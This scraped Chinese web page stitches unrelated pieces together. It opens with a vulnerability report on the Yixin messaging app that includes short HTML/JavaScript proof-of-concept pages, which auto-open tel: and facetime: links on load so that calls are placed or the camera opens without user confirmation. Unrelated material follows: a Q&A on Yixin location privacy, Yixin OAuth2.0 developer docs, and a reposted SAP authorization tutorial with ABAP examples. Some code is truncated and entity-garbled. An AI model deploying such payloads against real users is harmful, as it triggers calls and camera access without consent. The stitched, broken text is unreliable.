易信未授权自动拨打电话，开启摄像头等 - 网络安全 - 红黑联盟
易信未授权自动拨打电话，开启摄像头等
易信某处设计缺陷，可导致拨打任意电话，开启摄像头等
1.测试版本
iOS版本6.1.4
易信V2.9.0.1680
是利用tel协议，以及苹果的facetime协议，设计不当，可导致用户点击构造的url后而自动拨打某电话，无需确认；而且可以自动开启facetime，打开摄像头，也无需用户的确认。
1.文件内容1，此代码为打开页面后利用tel协议拨打电话，测试的url为/v1.php
&title&v&/title&
&a id=&dial& href=&tel:10086&&fuck it&/a&
&script type=&text/javascript&&
window.onload = function()
window.location.href = document.getElementById(&dial&).
2.文件内容2，此代码打开facetime，测试url为/face.php
&title&v&/title&
&a id=&dial& href=&facetime:&&fuck it&/a&
&script type=&text/javascript&&
window.onload = function()
window.location.href = document.getElementById(&dial&).
3.测试过程，用户发布链接，如图1
然后好友查看朋友圈，点击链接后，直接拨打电话，无任何确认信息，结果如下图。
同时，发布打开facetime的链接，同样好友在朋友圈查看，点击链接，效果如下。直接开启facetime而无任何提醒。
修复方案：
具体见苹果的facetime协议细节/library/ios/featuredarticles/iPhoneURLScheme_Reference/FacetimeLinks/FacetimeLinks.html#//apple_ref/doc/uid/TP-CH2-SW1
以及tel协议的相关内容
http://tools.ietf.org/html/rfc3966
/library/ios/featuredarticles/iPhoneURLScheme_Reference/PhoneLinks/PhoneLinks.html#//apple_ref/doc/uid/TP-CH6-SW1怎样开启信息权限位置 易信的朋友地图_百度知道
怎样开启信息权限位置 易信的朋友地图
我有更好的答案
易信图位置公或设置权限更改除非想要点刷遍朋友图操作:打朋友图面设置点击进入选择向公我位置或清除位置并推图亲满意
易信地图的位置可以不公开或是设置权限，不可更改，除非你到想要的地点在刷一遍朋友地图。操作方法如下：打开朋友地图，下面有个设置点击进入，选择不向对方公开我的位置或是清除位置并推出，如下图，亲，满意请采纳！
一、”易信”来了，它是谁? 易信，是由中国电信与网易公司联合出品的一款为智能手机提供即时通讯服务的应用程序。易信支持跨通信运营商、跨手机操作系统平台，可以通过手机通讯录向联系人发送免费短信，向手机或固定电话发送电话留言，同时，也可以向好友发送语音、视频、图片、表情和文字。此外，还可以通过“朋友圈”拍照记录生活，上传文字、图片与好友们分享自己的近况。二、易信欢迎页及注册登录1.易信欢迎页 初次启动易信，如其他软件一样，你会看见易信简易的功能介绍，易信的欢迎页的颜色清新、配图可爱，着实惹人眼球: 易信欢迎界面配图2.注册与登录窗口 易信使用手机号码注册，手机通讯录里的人基本上都是相识的熟人，保证了好友身份的真实性，基于此易信将建立一个具有更高信任度的社交圈，使我们敞...
点击右下角的加号,点击免得短信。还可以免得留语音电话,对方接听的话屏幕会显示已接听。采纳哦
其他类似问题
为您推荐：
地图的相关知识
等待您来回答
下载知道APP
随时随地咨询
出门在外也不愁易信网页授权接口
关于OAuth2.0的详细介绍，可以参考媒体文件:[OAuth2.0协议标准|]
第三方开发者进行易信OAuth2.0要符合以下条件：
1、拥有一个易信公众账号，并获取到appid、secret（公众号开通并开启开发者模式后可在后台看到这两个参数）；
2、提供跳转域名（redirect_uri），该回调地址必须和开发者模式所填的url在同一域名下，若开发者模式填的是IP地址，此处也必须是这个IP地址。例如：开通开发模式时填的url为
那么回调地址redirect_uri必须是
开头的一个url,此处只验证域名，后面的目录不验证。如果填的是IP
那么回调地址redirect_uri也必须是
开头的一个url，同样不验证目录。
关于网页授权access_token和普通access_token的区别
1、易信网页授权是通过OAuth2.0机制实现的，在用户默认授权给公众号后，公众号可以获取到一个网页授权特有的接口调用凭证（网页授权access_token），通过网页授权access_token可以进行授权后接口调用，如获取用户基本信息；
2、其他易信接口，需要通过基础支持中的“获取凭证”接口来获取到的普通access_token调用。
目前易信网页授权中应用授权作用域“scope”参数限定为snsapi_base。因此，易信网页授权是静默授权，用户无感知。
易信目前支持Authorization code授权模式，主要流程分为三步：
1、引导用户进入授权页面同意授权，获取code
2、通过code换取网页授权access_token（与基础支持中的access_token不同）
3、如果需要，开发者可以刷新网页授权access_token，避免过期
4、通过网页授权access_token和openid获取用户基本信息
在确保易信公众账号拥有授权作用域（scope参数）的权限的前提下，使用易信客户端打开以下链接（严格按照以下格式）：
若提示“该链接无法访问”，请检查参数是否填写错误，是否拥有scope参数对应的授权作用域权限。
参考链接(请在易信客户端中打开此链接体验)
应用唯一标识
redirect_uri
重定向地址（该地址需要和公众号接入开发者模式的URL在同一域名下；目前回调地址不支持携带自定义参数）
response_type
应用授权作用域，目前为固定参数“snsapi_base”
重定向后会带上state参数，开发者可以填写任意参数值
#yixin_redirect
直接在易信打开链接，可以不填此参数。
用户允许授权后，将会重定向到redirect_uri的网址上，并且带上code和state参数
redirect_uri?code=CODE&state=STATE
针对上述参考链接的前端正确返回为：
获取第一步的code后，请求以下链接获取access_token：
公众号唯一标识
公众号密钥
填写第一步获取的code参数
grant_type
authorization_code
正确的返回：
"access_token":"ACCESS_TOKEN",
"expires_in":7200,
"refresh_token":"REFRESH_TOKEN",
"openid":"OPENID",
"scope":"SCOPE"
access_token
用户授权凭证。注意:此access_token与调用接口的access_token不同。
expires_in
过期时间 （单位s）
refresh_token
用于刷新access_token
授权用户唯一标识
用户授权的作用域
错误返回样例：
{&errcode&:40029,&errmsg&:&invalid code&}
由于access_token拥有较短的有效期，当access_token超时后，可以使用refresh_token进行刷新，refresh_token拥有较长的有效期（30天），当refresh_token失效的后，需要用户重新授权。
获取第二步的refresh_token后，请求以下链接刷新access_token：
公众号唯一标识
grant_type
refresh_token
refresh_token
通过code获取到的refresh_token参数
正确的返回：
"access_token":"ACCESS_TOKEN",
"expires_in":7200,
"refresh_token":"REFRESH_TOKEN",
"openid":"OPENID",
"scope":"SCOPE"
access_token
接口调用凭证，不作为支付相关凭证
expires_in
access_token接口调用凭证超时时间，单位（秒）
refresh_token
用户刷新access_token
授权用户唯一标识
用户授权的作用域，使用逗号（,）分隔
错误返回样例：
{"errcode":42009,"errmsg":"APPID不一致"}
此处需要验证openid和appid的好友关系（用户必须关注公众号）
access_token
调用接口凭证（用户授权凭证，非全局凭证）
普通用户的标识，对当前公众号唯一
返回数据示例（正确时的JSON返回结果）：
"subscribe": 1,
"openid": "OPENID",
"nickname": "NICKNAME",
"sex": "sex",
"language": "LANG",
"city": "city"
用户是否订阅该公众号标识，值为0时，拉取不到其余信息
普通用户的标识，对当前公众号唯一
普通用户的昵称
性别(0:未知，1：男，2：女，3：无效值)
普通用户的语言，简体中文为zh_CN
错误时易信会返回错误码等信息，JSON数据包示例如下（该示例为AppID无效错误）:
{"errcode":40013,"errmsg":"invalid appid"}
注：第三方开发在使用此服务时，不要作为支付类服务的唯一凭证。
Copyright&&&&&Yixin. All Rights Reserved用心创造滤镜
扫码下载App
汇聚2000万达人的兴趣社区下载即送20张免费照片冲印
扫码下载App
温馨提示！由于新浪微博认证机制调整，您的新浪微博帐号绑定已过期，请重新绑定！&&|&&
挫其锐,解其纷,和其光,同其尘。
LOFTER精选
网易考拉推荐
用微信&&“扫一扫”
将文章分享到朋友圈。
用易信&&“扫一扫”
将文章分享到朋友圈。
（.cn/s/blog_7c7bfac.html）用户的权限菜单是通过分配具体角色来实现的.1. 创建角色PFCG输入角色名并点击Single Role为角色分配权限菜单.为角色配置权限数据维护完菜单后,&仅实现在用户菜单中能看到相关的事务,&要具有此事务权限还待设置具体的权限数据.SAP程式在执行中会通过读取该参数文件的数据来进行用户权限的检查及管控.在SAP实际应用中, 用户所直接操作的是屏幕及屏幕所对应的字段, 而这些具体的字段都是由权限对象进行控制, 包括该字段所允许的操作及允许的值.* 表示为该字段分配完全权限.通过状态灯图标来表示各权限对象的维护状态, 绿灯代表激活, 黄色代表未激活, 红色代表未给权限字段分配值, 单击权限字段前的铅笔图标可以定义该字段的授权值.一些常用的权限字段:ACTVT: 该字段存放的就是允许操作的代码, 例如 01 代表创建,02 代表修改,03代表显示等;TCD:　存放该权限角色所包含的事务代码;该图说明允许该角色的用户能查看和更改物料的Status.权限对象维护完成后,点Generate 将该权限数据激活.将角色分配给用户:进行用户比较, 只有单击"完成比较"按钮,该用户所对应的权限角色才将正式生效.自定义权限对象:1. 权限字段的维护:SU20创建权限字段.2. 对象类及权限对象的维护SU21对象类是多个权限对象的集合, 而一个权限对象下又可分配多个权限字段, 新增的用户自定义权限对象, 需要单击工具栏中的"Regenerate SAP_ALL" 按钮才会把新增的权限对象赋值给SAP_ALL这个权限参数文件.3. 权限对象的分配.SU22把权限对象(Authorization Object)分配给事务代码.有个奇怪的问题是: 我用SU22给自己的事务码分配了自定义的 Authorization Object 后, 为什么在用 PFCG 增加权限的时候这个 Authorization Object 不能自动带过来, 而系统自身的 Tcode 却能带过已经分配给它的 Authorization Object. 有知道的同学们请告知一声. 可加 QQ 群:& 或QQ: 权限对象在 ABAP 程序中的调用.For Example 1.&对Parameters输入的检查:-------------------------------------------------------REPORT&&z_af_034.TABLES:&marc.PARAMETERS:&s_werks&LIKE&marc-werks&DEFAULT&'1000'.AT&SELECTION-SCREEN.&&AUTHORITY-CHECK&OBJECT&'ZS002'&&&&&&&&&&&ID&'ZWERKS'&FIELD&s_werks.&&IF&sy-subrc&&&&0.&&&&MESSAGE&'权限检查失败'&TYPE&'E'.&&ENDIF.START-OF-SELECTION.--------------------------------------------------------For Example 2.对 select-options 数据的权限检查:--------------------------------------------------------REPORT&&z_af_034.TABLES:&marc.DATA:&errstr&TYPE&string.SELECT-OPTIONS:&s_werks&FOR&marc-werks.START-OF-SELECTION.&&LOOP&AT&s_werks.&&&&IF&NOT&s_werks&IS&INITIAL.&&&&&&AUTHORITY-CHECK&OBJECT&'ZS002'&&&&&&&&&&&&&&&&ID&'ZWERKS'&FIELD&s_werks-low.&&&&&&CONCATENATE&'Plant&'&s_werks-low&'&No&Authorization'&INTO&errstr.&&&&&&MESSAGE&errstr&TYPE&'E'.&&&&&&EXIT.&&&&ENDIF.&&&&IF&NOT&s_werks&IS&INITIAL.&&&&&&AUTHORITY-CHECK&OBJECT&'ZS002'&&&&&&&&&&&&&&&&ID&'ZWERKS'&FIELD&s_werks-high.&&&&&&CONCATENATE&'Plant&'&s_werks-high&'&No&Authorization'&INTO&errstr.&&&&&&MESSAGE&errstr&TYPE&'E'.&&&&&&EXIT.&&&&ENDIF.&&ENDLOOP.--------------------------------------------------------------可通过 Function GET_AUTH_VALUES 获取权限对象的权限值.用户权限缺失的检查.SU531).检查操作用户是否被授权能操作所执行的事务.2).检查操作用户被授权的权限角色里面是否包含程序所调用的权限对象.3).检查操作用户的权限检查字段输入值是否包含在权限字段.在用户执行某个程式权限检查失败后, 输入 SU53 就能看到权限评估检查报表.如下图所示:查找权限角色:如何知道某个 Tcode 分配给了哪些 Role?SUIM
阅读(2075)|
用微信&&“扫一扫”
将文章分享到朋友圈。
用易信&&“扫一扫”
将文章分享到朋友圈。
历史上的今天
loftPermalink:'',
id:'fks_095067',
blogTitle:'（转）SAP 用户权限控制设置及开发',
blogAbstract:'基本概念：&&& * SAP系统',
blogTag:'sap,权限设计',
blogUrl:'blog/static/',
isPublished:1,
istop:false,
modifyTime:8,
publishTime:0,
permalink:'blog/static/',
commentCount:0,
mainCommentCount:0,
recommendCount:0,
bsrk:-100,
publisherId:0,
recomBlogHome:false,
currentRecomBlog:false,
attachmentsFileIds:[],
groupInfo:{},
friendstatus:'none',
followstatus:'unFollow',
pubSucc:'',
visitorProvince:'',
visitorCity:'',
visitorNewUser:false,
postAddInfo:{},
mset:'000',
remindgoodnightblog:false,
isBlackVisitor:false,
isShowYodaoAd:false,
hostIntro:'挫其锐,解其纷,和其光,同其尘。',
hmcon:'0',
selfRecomBlogCount:'0',
lofter_single:''
{list a as x}
{if x.moveFrom=='wap'}
{elseif x.moveFrom=='iphone'}
{elseif x.moveFrom=='android'}
{elseif x.moveFrom=='mobile'}
${a.selfIntro|escape}{if great260}${suplement}{/if}
{list a as x}
推荐过这篇日志的人：
{list a as x}
{if !!b&&b.length>0}
他们还推荐了：
{list b as y}
转载记录：
{list d as x}
{list a as x}
{list a as x}
{list a as x}
{list a as x}
{if x_index>4}{break}{/if}
${fn2(x.publishTime,'yyyy-MM-dd HH:mm:ss')}
{list a as x}
{if !!(blogDetail.preBlogPermalink)}
{if !!(blogDetail.nextBlogPermalink)}
{list a as x}
{if defined('newslist')&&newslist.length>0}
{list newslist as x}
{if x_index>7}{break}{/if}
{list a as x}
{var first_option =}
{list x.voteDetailList as voteToOption}
{if voteToOption==1}
{if first_option==false},{/if}&&“${b[voteToOption_index]}”&&
{if (x.role!="-1") },“我是${c[x.role]}”&&{/if}
&&&&&&&&${fn1(x.voteTime)}
{if x.userName==''}{/if}
网易公司版权所有&&
{list x.l as y}
{if defined('wl')}
{list wl as x}{/list}智能手机教程子分类}